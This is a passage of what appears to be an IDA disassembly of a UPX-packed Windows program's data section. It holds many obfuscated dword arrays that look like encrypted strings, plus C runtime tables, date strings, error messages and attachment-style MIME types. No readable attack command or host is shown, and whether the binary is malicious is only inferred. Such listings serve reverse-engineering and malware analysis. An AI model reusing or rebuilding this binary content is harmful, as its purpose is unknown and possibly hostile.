dword_429A58 dd 0A42E0A2Ah, 2B5B7969h, 2634181h, 0E0h ; DATA XREF: sub_40D9F0+30E�o
dword_429A68 dd 0A1261539h, 2C017167h, 65BCAh ; DATA XREF: sub_40D9F0+330�o
dword_429A74 dd 0A32A0A38h, 2101786Ch, 642C0h ; DATA XREF: sub_40D9F0+352�o
dword_429A80 dd 0A3220138h, 21017C66h, 642C0h ; DATA XREF: sub_40D9F0+374�o
dword_429A8C dd 0AF2A1E3Bh, 6C43796Eh, 76724AC1h ; DATA XREF: sub_40D9F0+39C�o
dword_429A98 dd 0A92A1D3Ah, 2B437E60h, 15284AC1h, 2BA48Fh ; DATA XREF: sub_40D9F0+3BE�o
dword_429AA8 dd 0AD271934h, 234C3E60h, 0AFh ; DATA XREF: sub_40D9F0+3E0�o
dword_429AB4 dd 0AF270134h, 6C43796Eh, 766B40CCh ; DATA XREF: sub_40D9F0+402�o
; ---------------------------------------------------------------------------
loc_429AC0: ; DATA XREF: sub_40D9F0+424�o
and [ecx], edx
and [edi+2B4E7D77h], esi
retn
; ---------------------------------------------------------------------------
db 1, 69h, 4
align 10h
dword_429AD0 dd 0AE261920h, 2641717Fh, 196501CEh, 2BE98Dh ; DATA XREF: sub_40D9F0+44C�o
dword_429AE0 dd 0AF774B7Ch, 6C43796Eh, 566B40CCh, 0E0h ; DATA XREF: sub_40D9F0+46E�o
dword_429AF0 dd 0A3260B2Ch, 2E467162h, 1B694C81h, 0E0h ; DATA XREF: sub_40D9F0+490�o
dword_429B00 dd 0A73D1726h, 23427E6Eh, 152843C6h, 2BA48Fh ; DATA XREF: sub_40D9F0+4B2�o
dword_429B10 dd 0AE261920h, 2346636Eh, 1B694C81h, 0E0h ; DATA XREF: sub_40D9F0+4D4�o
; ---------------------------------------------------------------------------
loc_429B20: ; DATA XREF: sub_40D9F0+4FC�o
and [ecx], al
cmp [ebx+2D4C3E76h], ah
retn 2Fh
; ---------------------------------------------------------------------------
align 4
dword_429B2C dd 0AA3C0D25h, 2E467162h, 1B694C81h, 0E0h ; DATA XREF: sub_40D9F0+51E�o
dword_429B3C dd 0AA3C0D25h, 2F407321h, 0AFh ; DATA XREF: sub_40D9F0+540�o
dword_429B48 dd 0A72A0A2Bh, 2E467162h, 1B694C81h, 5F5EA8CEh ; DATA XREF: sub_40D9F0+562�o
dword_429B58 dd 0EC2E1529h, 2F756Dh ; DATA XREF: sub_40D9F0+584�o
dword_429B60 dd 0AE261920h, 3B5B796Ch, 1B694C81h, 0E0h ; DATA XREF: sub_40D9F0+5AC�o
dword_429B70 dd 0B02E0C3Eh, 2E467162h, 1B694C81h, 0E0h ; DATA XREF: sub_40D9F0+5CE�o
dword_429B80 dd 0AE20172Eh, 2E467162h, 76695B81h ; DATA XREF: sub_40D9F0+5F0�o
dword_429B8C dd 0EC2E0B38h, 425B7561h ; DATA XREF: sub_40D9F0+612�o
dword_429B94 dd 0A92C173Fh, 2342646Ah, 152843C6h, 2BA48Fh ; DATA XREF: sub_40D9F0+634�o
dword_429BA4 dd 0AE261920h, 365C7162h, 15285DCAh, 2BA48Fh ; DATA XREF: sub_40D9F0+65C�o
dword_429BB4 dd 0A33B142Ch, 365C7979h, 1F6201CEh, 3E5FA087h, 71A638EDh
; DATA XREF: sub_40D9F0+67E�o
dd 0B311h
dword_429BCC dd 0AB3A1920h, 2E467162h, 1B694C81h, 0E0h ; DATA XREF: sub_40D9F0+6A0�o
dword_429BDC dd 0AE261920h, 2C4A7322h, 58744ADBh, 5F46A683h ; DATA XREF: sub_40D9F0+6C2�o
; ---------------------------------------------------------------------------
loc_429BEC: ; DATA XREF: sub_40D9F0+6E4�o
sub [edx], al
cmp [edi+2B4E7D6Dh], ah
retn
; ---------------------------------------------------------------------------
db 4Ah, 74h, 58h
dd 5F46A683h
dword_429BFC dd 0A02C1920h, 21016860h, 642C0h ; DATA XREF: sub_40D9F0+70C�o
dword_429C08 dd 0A92C173Fh, 2342646Ah, 152843C6h, 2BA48Fh ; DATA XREF: sub_40D9F0+72E�o
dword_429C18 dd 0AF3B1725h, 2101736Eh, 642C0h ; DATA XREF: sub_40D9F0+750�o
dword_429C24 dd 0AF774075h, 6C43796Eh, 76724AC1h ; DATA XREF: sub_40D9F0+772�o
dword_429C30 dd 0EF7C4A7Ch, 2B4E7D6Ah, 196501C3h, 0C98Dh ; DATA XREF: sub_40D9F0+794�o
dword_429C40 dd 0AE261920h, 2E5B7121h, 15285CCEh, 0C99Ah ; DATA XREF: sub_40D9F0+7BC�o
dword_429C50 dd 0A3221624h, 31017C66h, 2FC4h ; DATA XREF: sub_40D9F0+7DE�o
; ---------------------------------------------------------------------------
loc_429C5C: ; DATA XREF: sub_40D9F0+800�o
cmp bl, [ecx]
and ebp, [esi+2D4C3E6Eh]
retn 2Fh
; ---------------------------------------------------------------------------
align 4
dword_429C68 dd 0AD2D1624h, 2D4C3E77h, 2FC2h ; DATA XREF: sub_40D9F0+822�o
dword_429C74 dd 0AE260D0Fh, 244A426Bh, 17745DCAh, 3C05BA8Ch, 1EE57BEEh
; DATA XREF: sub_40D9F0+844�o
dword_429C88 dd 0B0291D3Fh, 304E676Ah, 15285CCBh, 2BA48Fh ; DATA XREF: sub_40D9F0+86C�o
dword_429C98 dd 0AB3F172Ah, 21017563h, 642C0h ; DATA XREF: sub_40D9F0+88E�o
; ---------------------------------------------------------------------------
loc_429CA4: ; DATA XREF: sub_40D9F0+8B0�o
and [ecx], al
aas
mov ds:2D4C3E6Bh, eax
retn 2Fh
; ---------------------------------------------------------------------------
align 10h
dword_429CB0 dd 0B629171Eh, 27427F47h, 2634181h, 0E0h ; DATA XREF: sub_40D9F0+8D2�o
dword_429CC0 dd 0B83B1D23h, 23437F60h, 1B694C81h, 0E0h ; DATA XREF: sub_40D9F0+8F4�o
dword_429CD0 dd 0EC7D1338h, 425B7561h ; DATA XREF: sub_40D9F0+91C�o
dword_429CD8 dd 0AE21113Ah, 2C467760h, 0AFh ; DATA XREF: sub_40E390+3�o
dword_429CE4 dd 0B53B1D23h, 2F7E66h ; DATA XREF: sub_40E390+24�o
dword_429CEC dd 0A3391927h, 42417978h ; DATA XREF: sub_40E390+42�o
dword_429CF4 dd 0B23A1D24h, 275B716Bh, 0AFh ; DATA XREF: sub_40E390+63�o
dword_429D00 dd 0A4200B20h, 274C7969h, 0AFh ; DATA XREF: sub_40E390+84�o
; ---------------------------------------------------------------------------
loc_429D0C: ; DATA XREF: sub_40E390+AC�o
and ebx, ds:747FB73Bh
dec esi
db 36h
retf 2Fh
; ---------------------------------------------------------------------------
align 4
dword_429D18 dd 0A73D112Bh, 35577F69h, 0AFh ; DATA XREF: sub_40E390+CD�o
dword_429D24 dd 0B62A1624h, 0Fh ; DATA XREF: sub_40E390+EE�o
dword_429D2C dd 0AA2C0E3Eh, 355B6360h, 641C6h ; DATA XREF: sub_40E390+10F�o
dword_429D38 dd 0B12E0B21h, 2C46677Ch, 0AFh ; DATA XREF: sub_40E390+130�o
dword_429D44 dd 0AE21113Ah, 2C407760h, 2FD8h ; DATA XREF: sub_40E390+151�o
dword_429D50 dd 0B43D1D3Eh, 314A7366h, 2FD8h ; DATA XREF: sub_40E390+172�o
dword_429D5C dd 0B5221C20h, 0Fh ; DATA XREF: sub_40E390+193�o
dword_429D64 dd 0AD20083Eh, 42586363h ; DATA XREF: sub_40E390+1B4�o
dword_429D6C dd 0AF3B1E2Eh, 42587E60h ; DATA XREF: sub_40E390+1DC�o
dword_429D74 dd 0A520170Ah, 23677563h, 644CCh ; DATA XREF: sub_40E5A0+3�o
dword_429D80 dd 0A71C0100h, 34405D77h, 64AC6h ; DATA XREF: sub_40E5A0+24�o
dword_429D8C dd 0AE23191Ah, 275F715Fh, 2FDDh ; DATA XREF: sub_40E5A0+42�o
dword_429D98 dd 0A621111Ah, 625C6760h, 1F744ADCh, 310BA581h, 7BA77BF4h
; DATA XREF: sub_40E5A0+63�o
dd 0DEE49D0Eh, 5B6BB6h
dword_429DB4 dd 0B26F0100h, 355C636Eh, 5625DC0h, 2B53BDCEh, 16A1h
; DATA XREF: sub_40E5A0+84�o
dword_429DC8 dd 0B72B1D1Eh, 2D46646Ch, 13750FC1h, 2B4EBB83h, 66B138F2h
; DATA XREF: sub_40E5A0+AC�o
dd 909308h
dword_429DE0 dd 0A621111Ah, 625C6760h, 1F744ADCh, 310BA581h, 7BA77BF4h
; DATA XREF: sub_40E5A0+CD�o
dd 0C9F49D0Eh, 5B6BA1h
dword_429DFC dd 0B26F0100h, 355C636Eh, 5625DC0h, 3C44ADCEh, 16A1h
; DATA XREF: sub_40E5A0+EE�o
dword_429E10 dd 0B72B1D1Eh, 2D46646Ch, 13750FC1h, 2B4EBB83h, 71A138F2h
; DATA XREF: sub_40E5A0+10F�o
dd 90931Fh
dword_429E28 dd 0A321162Ch, 0Fh ; DATA XREF: sub_40E8B0+36�o
dword_429E30 dd 0AA3C0D2Fh, 0Fh ; DATA XREF: sub_40E8B0+5C�o
dword_429E38 dd 0A520170Ah, 23677563h, 644CCh ; DATA XREF: sub_40E8B0+A3�o
dword_429E44 dd 0A71C0100h, 21464077h, 13745ADBh, 0E0h ; DATA XREF: sub_40E8B0+D4�o
dword_429E54 dd 0AE23191Ah, 275F715Fh, 2FDDh ; DATA XREF: sub_40E8B0+FC�o
dword_429E60 dd 0AB180100h, 2F7569h ; DATA XREF: sub_40E8B0+11E�o
dword_429E68 dd 8C3D0D02h, 236C676Ah, 2FDDh ; DATA XREF: sub_40E8B0+140�o
dword_429E74 dd 8C3D0D02h, 2D67676Ah, 76635CDAh ; DATA XREF: sub_40E8B0+162�o
dword_429E80 dd 0A621111Ah, 625C6760h, 1F744ADCh, 310BA581h, 7BA77BF4h
; DATA XREF: sub_40E8B0+184�o
dd 0B30Eh
dword_429E98 dd 0B26F0100h, 355C636Eh, 5625DC0h, 0E0h ; DATA XREF: sub_40E8B0+1AC�o
dword_429EA8 dd 0B72B1D1Eh, 2D46646Ch, 13750FC1h, 2B4EBB83h, 16F2h
; DATA XREF: sub_40E8B0+1CE�o
dword_429EBC dd 0A53F1263h, 0Fh ; DATA XREF: sub_40EAE0+F�o
dword_429EC4 dd 0A4260863h, 0Fh ; DATA XREF: sub_40EB20+25�o
dword_429ECC dd 0A7371D63h, 0Fh ; DATA XREF: sub_40EB20:loc_40EB62�o
dword_429ED4 dd 0C27C0820h ; DATA XREF: sub_40EB90+36�o
dword_429ED8 dd 9D381D23h, 421C6062h ; DATA XREF: sub_40EB90+5C�o
dword_429EE0 dd 0A72B113Bh, 1060h ; DATA XREF: sub_40EB90+7C�o
dword_429EE8 dd 9D381D23h, 274B7979h, 2FC0h ; DATA XREF: sub_40EB90+9E�o
dword_429EF4 dd 0B1100120h, 2449717Bh, 0AFh ; DATA XREF: sub_40EB90+C0�o
dword_429F00 dd 9D2B0E29h, 2D497E66h, 0AFh ; DATA XREF: sub_40EB90+E2�o
dword_429F0C dd 0C2370035h ; DATA XREF: sub_40EB90+104�o
dword_429F10 dd 0AD2C2725h, 2F757Dh ; DATA XREF: sub_40EB90+12C�o
dword_429F18 dd 0A610103Eh, 425C7360h ; DATA XREF: sub_40EB90+14E�o
dword_429F20 dd 0A72A0A2Bh, 0Fh ; DATA XREF: sub_40EB90+170�o
dword_429F28 dd 0B620103Dh, 1060h ; DATA XREF: sub_40EB90+192�o
dword_429F30 dd 0A1210D21h, 1067h ; DATA XREF: sub_40EB90+1B4�o
dword_429F38 dd 0AA3B2721h, 2F6366h ; DATA XREF: sub_40EB90+1DC�o
dword_429F40 dd 0A7241939h, 425B7950h ; DATA XREF: sub_40EB90+1FE�o
dword_429F48 dd 0B23B0C25h, 42003F35h ; DATA XREF: sub_40EF50+14�o
dword_429F50 dd 0B23B0C25h, 42003F35h ; DATA XREF: sub_40EFC0+15�o
off_429F58 dd offset off_424FC8 ; DATA XREF: UPX0:0042641C�o
align 10h
a_?avexception@ db '.?AVException@S_NS@@',0
align 4
dd offset off_424FC8
align 10h
dd 5841502Eh, 0
off_429F88 dd offset off_424FC8 ; DATA XREF: UPX0:004269F4�o
align 10h
a_pavexception@ db '.PAVException@S_NS@@',0
align 4
dd offset dword_4245D8+0Ch
off_429FAC dd offset dword_4245D8 ; DATA XREF: sub_414690+F8�r
; sub_414690:loc_4147CD�r
off_429FB0 dd offset dword_4245D4 ; DATA XREF: sub_414690+2E6�r
; sub_414690+429�r
dd offset dword_4245B8+18h
dd offset dword_4245B8+14h
dd offset dword_4245B8+10h
dd offset dword_4245B8+0Ch
dd offset dword_4245B8+8
dd offset dword_4245B8+4
dd offset dword_424660
off_429FD0 dd offset word_424470 ; DATA XREF: sub_412210+74�r
; sub_412CA0+79�r ...
dd offset aJan ; "Jan"
dd offset aFeb ; "Feb"
dd offset aMar ; "Mar"
dd offset aApr ; "Apr"
dd offset aMay ; "May"
dd offset aJun ; "Jun"
dd offset aJul ; "Jul"
dd offset aAug ; "Aug"
dd offset aSep ; "Sep"
dd offset aOct ; "Oct"
dd offset aNov ; "Nov"
dd offset aDec ; "Dec"
off_42A004 dd offset aAbcdefghijklmn ; DATA XREF: sub_4156E0+75�r
; sub_4156E0:loc_415850�r ...
; "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklm"...
off_42A008 dd offset a_pdf ; DATA XREF: sub_415AE0:loc_415BB0�r
; sub_415AE0+EB�o
; ".pdf"
off_42A00C dd offset aApplicationPdf ; DATA XREF: sub_415AE0:loc_415BEE�r
; "application/pdf"
dd offset a_xls ; ".xls"
dd offset aApplicationVnd ; "application/vnd.ms-excel"
dd offset a_gif ; ".gif"
dd offset aImageGif ; "image/gif"
dd offset a_jpg ; ".jpg"
dd offset aImageJpeg ; "image/jpeg"
dd offset a_bmp ; ".bmp"
dd offset aImageBmp ; "image/bmp"
dd offset a_png ; ".png"
dd offset aImagePng ; "image/png"
align 10h
dword_42A040 dd 1Eh ; DATA XREF: sub_413B10:loc_413E57�r
; sub_413B10+388�r ...
dd 1, 0FFFFFFFFh
dword_42A04C dd 6 ; DATA XREF: sub_4165C0+7D�w
; sub_416DF0+196�r ...
dd 2 dup(1)
dword_42A058 dd 1 ; DATA XREF: sub_4165C0+C2�w
dd offset a_z_zip_zoo_arc ; ".Z:.zip:.zoo:.arc:.lzh:.arj"
dd offset dword_430B24
off_42A064 dd offset sub_416D60 ; DATA XREF: sub_416DF0+17C�w
; sub_417710+10D�r ...
word_42A068 dw 0 ; DATA XREF: sub_417B60+4D�r
word_42A06A dw 0 ; DATA XREF: sub_417B60+45�r
word_42A06C dw 0 ; DATA XREF: sub_417B60+5B�r
word_42A06E dw 0 ; DATA XREF: sub_417B60+69�r
dd 40004h, 40008h, 50004h, 80010h, 60004h, 200020h, 40004h
dd 100010h, 100008h, 200020h, 100008h, 800080h, 200008h
dd 1000080h, 800020h, 4000102h, 1020020h, 10000102h
dword_42A0B8 dd 0 ; DATA XREF: sub_4189C0+81�r
; sub_418B00:loc_418B40�r ...
dd 7 dup(0)
dd 4 dup(1), 4 dup(2), 4 dup(3), 4 dup(4), 4 dup(5), 2 dup(0)
dword_42A130 dd 0 ; DATA XREF: sub_418060+15E�r
; sub_4189C0+E1�r ...
dword_42A134 dd 0 ; DATA XREF: sub_418060+149�r
dword_42A138 dd 0 ; DATA XREF: sub_418060+134�r
dword_42A13C dd 0 ; DATA XREF: sub_418060+11F�r
dword_42A140 dd 1 ; DATA XREF: sub_418060+10A�r
dword_42A144 dd 1 ; DATA XREF: sub_418060+F7�r
dword_42A148 dd 2 dup(2), 2 dup(3), 2 dup(4), 2 dup(5), 2 dup(6), 2 dup(7)
dd 2 dup(8), 2 dup(9), 2 dup(0Ah), 2 dup(0Bh), 2 dup(0Ch)
dd 2 dup(0Dh), 10h dup(0)
dd 2, 3, 7
off_42A1F4 dd offset word_441210 ; DATA XREF: sub_418D90+26�o
dd offset byte_441B08
dd offset dword_42A0B8
dd 101h, 11Eh, 0Fh
dword_42A20C dd 0 ; DATA XREF: sub_4188D0�r
; sub_418D90+145�r
off_42A210 dd offset word_44BD28 ; DATA XREF: sub_418D90+30�o
dd offset word_430F80
dd offset dword_42A130
align 10h
dd 1Eh, 0Fh
dword_42A228 dd 0 ; DATA XREF: sub_4188D0+10�r
; sub_418D90+13F�r
off_42A22C dd offset word_44BC88 ; DATA XREF: sub_4188D0+20�o
dd 0
dd offset dword_42A148+60h
dd 0
dd 13h, 7, 0
byte_42A248 db 10h ; DATA XREF: sub_4188D0:loc_418910�r
; sub_418940:loc_418980�r
db 11h, 12h, 0
dd 6090708h, 40B050Ah, 20D030Ch, 0F010Eh
off_42A25C dd offset off_424FC8 ; DATA XREF: UPX0:off_4261A8�o
; UPX0:00426270�o ...
dd 0
a_?avexceptio_0 db '.?AVexception@@',0
off_42A274 dd offset off_424FC8 ; DATA XREF: UPX0:off_4261C0�o
; UPX0:00426200�o ...
dd 0
a_?avbad_alloc@ db '.?AVbad_alloc@std@@',0
dword_42A290 dd 75A4C2CCh ; DATA XREF: sub_401D60+6�r
; sub_401EB0+A�r ...
align 10h
dword_42A2A0 dd 19930520h, 3 dup(0) ; DATA XREF: sub_419825+2�o
; sub_41982E+2�o
dd offset sub_41EC16
off_42A2B4 dd offset off_424FC8 ; DATA XREF: UPX0:off_426208�o
; UPX0:00426244�o
dd 0
a_?avtype_info@ db '.?AVtype_info@@',0
align 10h
off_42A2D0 dd offset sub_41EB71 ; DATA XREF: sub_41A4AE+1C�r
dword_42A2D4 dd 2 ; DATA XREF: sub_41FB3B+58�r
; sub_41FCB2+E�r ...
align 10h
off_42A2E0 dd offset dword_47C780 ; DATA XREF: sub_41AA71+52�o
; sub_41AB2E+4�o ...
align 8
dd offset dword_47C780
dd 101h
dword_42A2F0 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41AA71+71�o
dd 1000h, 0
dword_42A300 dd 3 dup(0) ; DATA XREF: sub_4165C0+2D�o
; sub_41C547+53�o
dd 2, 0FFFFFFFFh, 3 dup(0)
dword_42A320 dd 3 dup(0) ; DATA XREF: sub_417710+E1�o
; sub_41C547+5B�o
dd 2, 0FFFFFFFFh, 7 dup(0)
dword_42A350 dd 7Ch dup(0) ; DATA XREF: sub_41AA71+9D�o
dword_42A540 dd 8 dup(0) ; DATA XREF: sub_41AB2E+D�o
; sub_41AB80+D�o
dword_42A560 dd 1 ; DATA XREF: sub_41AA71+67�o
; sub_41ED2E:loc_41F543�r
byte_42A564 db 2Eh ; DATA XREF: sub_41ED2E:loc_41F10B�r
; sub_41ED2E+404�r
align 4
dd 1, 0
dd 43h, 0
dword_42A578 dd 2, 8 dup(0) ; DATA XREF: sub_41B20E+AD�o
; sub_41B3A1+103�o ...
dd 2 dup(1), 3 dup(0)
dd offset off_42ABD4
align 10h
dd offset asc_425AA0 ; " ((((( H"
dd offset off_42AB18
dd 0
off_42A5CC dd offset dword_42A578 ; DATA XREF: sub_419312+D�r
; sub_419A76+1C�r ...
dd 0
dd 1, 8 dup(0)
dd 43h, 21h dup(0)
dd 43h, 20h dup(0)
dword_42A704 dd 8 ; DATA XREF: sub_41B313�r
; sub_41B313+11�w ...
dd offset sub_41EC16
off_42A70C dd offset sub_41BE81 ; DATA XREF: sub_41BEB6+C�r
off_42A710 dd offset aNull_0 ; DATA XREF: sub_41C6EE:loc_41CAE6�r
; sub_41C6EE+51C�r
; "(null)"
off_42A714 dd offset aNull ; DATA XREF: sub_41C6EE+2D8�r
; "(null)"
align 10h
off_42A720 dd offset dword_44BEF0 ; DATA XREF: sub_41CF94:loc_41CFD1�w
; sub_41CFDD+8�o ...
dword_42A724 dd 1 ; DATA XREF: sub_41CF94:loc_41CF9D�r
dd offset dword_44BF08
dd 1, 2 dup(0)
dd offset dword_44BF20
dd 1, 44BF38h, 1, 2 dup(0)
dd offset dword_44BF50
dd 1, 44BF68h, 1, 44BF80h, 1, 2 dup(0)
dd offset byte_44BF98
dd 1, 2 dup(0)
dd offset dword_44BFB0
dd 1, 44BFC8h, 1, 44BFE0h, 1, 2 dup(0)
dd offset dword_44BFF8
dd 1, 44C010h, 1, 44C028h, 1, 22h dup(0)
dword_42A840 dd 10h, 3 dup(0) ; DATA XREF: sub_41CFDD+2A�o
; sub_41CFDD+4A�o
dword_42A850 dd 1 ; DATA XREF: sub_41E697:loc_41E6A6�r
dword_42A854 dd 16h ; DATA XREF: sub_41E697+3B�r
dd 2 dup(2), 3, 2, 4, 18h, 5, 0Dh, 6, 9, 7, 0Ch, 8, 0Ch
dd 9, 0Ch, 0Ah, 7, 0Bh, 8, 0Ch, 16h, 0Dh, 16h, 0Fh, 2
dd 10h, 0Dh, 11h, 2 dup(12h), 2, 21h, 0Dh, 35h, 2, 41h
dd 0Dh, 43h, 2, 50h, 11h, 52h, 0Dh, 53h, 0Dh, 57h, 16h
dd 59h, 0Bh, 6Ch, 0Dh, 6Dh, 20h, 70h, 1Ch, 72h, 9, 6, 16h
dd 80h, 0Ah, 81h, 0Ah, 82h, 9, 83h, 16h, 84h, 0Dh, 91h
dd 29h, 9Eh, 0Dh, 0A1h, 2, 0A4h, 0Bh, 0A7h, 0Dh, 0B7h
dd 11h, 0CEh, 2, 0D7h, 0Bh, 718h, 0Ch, 2 dup(0)
dword_42A9C0 dd 2 ; DATA XREF: sub_41FB3B:loc_41FB61�r
; sub_41FB3B+3A�r
off_42A9C4 dd offset aR6002FloatingP ; DATA XREF: sub_41FB3B+D5�r
; sub_41FB3B+112�r ...
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 42590Ch, 9, 4258E0h, 0Ah, 425848h, 10h, 42581Ch
dd 11h, 4257ECh, 12h, 4257C8h, 13h, 42579Ch, 18h, 425764h
dd 19h, 42573Ch, 1Ah, 425704h, 1Bh, 4256CCh, 1Ch, 4256A4h
dd 1Dh, 425600h, 78h, 4255ECh, 79h, 4255DCh, 7Ah, 4255CCh
dd 0FCh, 42465Ch, 0FFh, 4255BCh
dword_42AA58 dd 0C0000005h, 0Bh, 0 ; DATA XREF: sub_41B330+41�o
; sub_41B3A1+70�o ...
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
db 8Dh, 0
dw 0C000h
dd 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
db 90h
db 2 dup(0), 0C0h
dd 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_42AAD0 dd 3 ; DATA XREF: sub_41FCEB+84�r
; sub_41FCEB+A3�r ...
dword_42AAD4 dd 7 ; DATA XREF: sub_41FCEB+8A�r
; sub_41FCEB+A9�r ...
dd 78h
dword_42AADC dd 0Ah ; DATA XREF: sub_41FCEB+14�r
; sub_422881�r
dword_42AAE0 dd 0FFFFFFFFh, 0A80h, 7 dup(0) ; DATA XREF: sub_41C547:loc_41C607�o
; sub_422605:loc_42268B�o
off_42AB04 dd offset asc_425AA0 ; DATA XREF: sub_41A89B:loc_41A96D�r
; sub_41C6EE:loc_41C90A�r ...
; " ((((( H"
dd offset dword_425CA0+2
dd 1, 42AB18h, 0
off_42AB18 dd offset dword_4245D4 ; DATA XREF: UPX0:0042A5C4�o
dd offset dword_4245B8+18h
dd offset dword_4245B8+14h
dd offset dword_4245B8+10h
dd offset dword_4245B8+0Ch
dd offset dword_4245B8+8
dd offset dword_4245B8+4
dd offset aSunday ; "Sunday"
dd offset aMonday ; "Monday"
dd offset aTuesday ; "Tuesday"
dd offset aWednesday ; "Wednesday"
dd offset aThursday ; "Thursday"
dd offset aFriday ; "Friday"
dd offset aSaturday ; "Saturday"
dd offset aJan ; "Jan"
dd offset aFeb ; "Feb"
dd offset aMar ; "Mar"
dd offset aApr ; "Apr"
dd offset aMay ; "May"
dd offset aJun ; "Jun"
dd offset aJul ; "Jul"
dd offset aAug ; "Aug"
dd offset aSep ; "Sep"
dd offset aOct ; "Oct"
dd offset aNov ; "Nov"
dd offset aDec ; "Dec"
dd offset aJanuary ; "January"
dd offset aFebruary ; "February"
dd offset aMarch ; "March"
dd offset aApril ; "April"
dd offset aMay ; "May"
dd offset aJune ; "June"
dd offset aJuly ; "July"
dd offset aAugust ; "August"
dd offset aSeptember ; "September"
dd offset aOctober ; "October"
dd offset aNovember ; "November"
dd offset aDecember ; "December"
dd offset aAm ; "AM"
dd offset aPm ; "PM"
dd offset aMmDdYy ; "MM/dd/yy"
dd offset aDdddMmmmDdYyyy ; "dddd, MMMM dd, yyyy"
dd offset aHhMmSs ; "HH:mm:ss"
dd 409h, 2 dup(1)
dword_42ABD0 dd 2Eh ; DATA XREF: UPX0:off_42ABD4�o
off_42ABD4 dd offset dword_42ABD0 ; DATA XREF: sub_420B31+15�r
; UPX0:0042A5B0�o ...
off_42ABD8 dd offset dword_44C22C ; DATA XREF: sub_420B31+32�r
off_42ABDC dd offset dword_44C22C ; DATA XREF: sub_420B31+4E�r
off_42ABE0 dd offset dword_44C22C ; DATA XREF: sub_420B90+1B�r
off_42ABE4 dd offset dword_44C22C ; DATA XREF: sub_420B90+38�r
off_42ABE8 dd offset dword_44C22C ; DATA XREF: sub_420B90+55�r
off_42ABEC dd offset dword_44C22C ; DATA XREF: sub_420B90+72�r
off_42ABF0 dd offset dword_44C22C ; DATA XREF: sub_420B90+8F�r
off_42ABF4 dd offset dword_44C22C ; DATA XREF: sub_420B90+AC�r
off_42ABF8 dd offset dword_44C22C ; DATA XREF: sub_420B90+C8�r
dd 2 dup(7F7F7F7Fh)
off_42AC04 dd offset off_42ABD4 ; DATA XREF: sub_420B31+B�r
; sub_420B31+27�r ...
align 10h
byte_42AC10 db 1 ; DATA XREF: sub_421204+C5�r
db 2, 4, 8
align 8
dword_42AC18 dd 3A4h ; DATA XREF: sub_421204:loc_421226�r
dword_42AC1C dd 82798260h ; DATA XREF: sub_421204+101�r
dd 21h, 0
dword_42AC28 dd 0DFA6h ; DATA XREF: sub_421204+A5�r
align 10h
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 3 dup(0)
off_42AD10 dd offset sub_422A28 ; DATA XREF: sub_41C6EE+476�r
off_42AD14 dd offset sub_422A28 ; DATA XREF: sub_41C6EE+4A2�r
off_42AD18 dd offset sub_422A28 ; DATA XREF: sub_41ED2E+538�r
off_42AD1C dd offset sub_422A28 ; DATA XREF: sub_41C6EE+491�r
dd offset sub_422A28
dd offset sub_422A28
align 10h
dd 7080h, 1, 0FFFFF1F0h, 0
dword_42AD40 dd 545350h, 0Fh dup(0) ; DATA XREF: UPX0:0042ADC0�o
dword_42AD80 dd 544450h, 0Fh dup(0) ; DATA XREF: UPX0:0042ADC4�o
dd offset dword_42AD40
dd offset dword_42AD80
dd 0FFFFFFFFh, 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd 0FFFFFFFFh, 1Eh, 3Bh, 5Ah, 78h, 97h, 0B5h, 0D4h, 0F3h
dd 111h, 130h, 14Eh, 16Dh, 0FFFFFFFFh, 1Eh, 3Ah, 59h, 77h
dd 96h, 0B4h, 0D3h, 0F2h, 110h, 12Fh, 14Dh, 16Ch, 6 dup(0)
off_42AE60 dd offset off_424460 ; DATA XREF: sub_401FC0+95�o
; sub_401FC0+C9�o ...
dd 343788h, 80h, 5, 44h, 3 dup(0)
dd 343860h, 6F9B7C8h, 1, 6F9B7C8h, 0E1Dh, 0B0E9h, 34536h
dd 6B3Dh, 1, 0
byte_42AEA8 db 0 ; DATA XREF: sub_412210+61�o
; sub_412210+2D8�w ...
byte_42AEA9 db 0 ; DATA XREF: sub_412210+2D0�w
; sub_412210+2F6�w
align 4
dd 0Fh dup(0)
byte_42AEE8 db 0 ; DATA XREF: sub_412210+117�w
byte_42AEE9 db 0 ; DATA XREF: sub_412210+10B�w
; sub_414690+134�w
byte_42AEEA db 0 ; DATA XREF: sub_412210+123�w
align 10h
byte_42AEF0 db 0 ; DATA XREF: sub_412210+15B�w
; sub_412210+233�o ...
align 4
dd 3Fh dup(0)
db 0
byte_42AFF1 db 0 ; DATA XREF: sub_412210+FF�w
align 8
byte_42AFF8 db 0 ; DATA XREF: sub_412210+179�w
; sub_412CA0+DA�o ...
align 4
dd 40h dup(0)
dword_42B0FC dd 0 ; DATA XREF: sub_412210+11D�w
; sub_412210+2AE�w ...
byte_42B100 db 0 ; DATA XREF: sub_414690:loc_41477F�r
; sub_414690+FE�o ...
align 4
dd 9 dup(0)
byte_42B128 db 0 ; DATA XREF: sub_412210+155�w
; sub_412210+250�o ...
align 4
dd 41h dup(0)
byte_42B230 db 0 ; DATA XREF: sub_412210+111�w
align 8
byte_42B238 db 0 ; DATA XREF: sub_412210+B4�w
; sub_412210+173�w ...
align 4
dd 0FFh dup(0)
word_42B638 dw 0 ; DATA XREF: sub_412210+E4�w
; sub_412210+1E7�o ...
align 4
dd 41h dup(0)
byte_42B740 db 0 ; DATA XREF: sub_412210+17F�w
; sub_412210+19B�o ...
align 4
dd 40h dup(0)
dword_42B844 dd 0 ; DATA XREF: sub_412210+84�w
dword_42B848 dd 0 ; DATA XREF: sub_412210+CC�w
align 10h
byte_42B850 db 0 ; DATA XREF: sub_412210+161�w
; sub_412210+21A�o ...
align 4
dd 41h dup(0)
